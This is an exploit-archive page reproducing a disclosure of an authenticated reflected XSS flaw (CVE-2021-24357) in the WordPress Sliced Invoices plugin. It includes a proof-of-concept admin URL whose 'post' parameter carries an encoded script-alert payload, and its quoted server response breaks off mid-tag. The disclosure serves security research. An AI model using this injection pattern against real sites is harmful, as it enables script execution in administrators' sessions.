Wordpress Sliced Invoices < = 3.8.2 Authenticated Reflected XSS
CVE
Category
Price
Severity
CVE-2021-24357
CWE-79
Not specified
High
Author
Risk
Exploitation Type
Date
N/A
High
Authenticated Reflected XSS
2019-10-24
CPE
cpe:cpe:/a:wpackagist:wp-sliced-invoices:3.8.2
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019100153 Below is a copy:
Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS # Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3
1. Description:
Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability.
2. Proof of Concept:
Reflected Cross-site scripting (XSS)
- Using an Wordpress user, access < your_target > /wp-admin/admin.php?action=duplicate_quote_invoice&post=%3Cscript%3Ealert(1)%3C%2fscript%3E
- The response will contain:
```
<body id="error-page">
<p>Cre
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum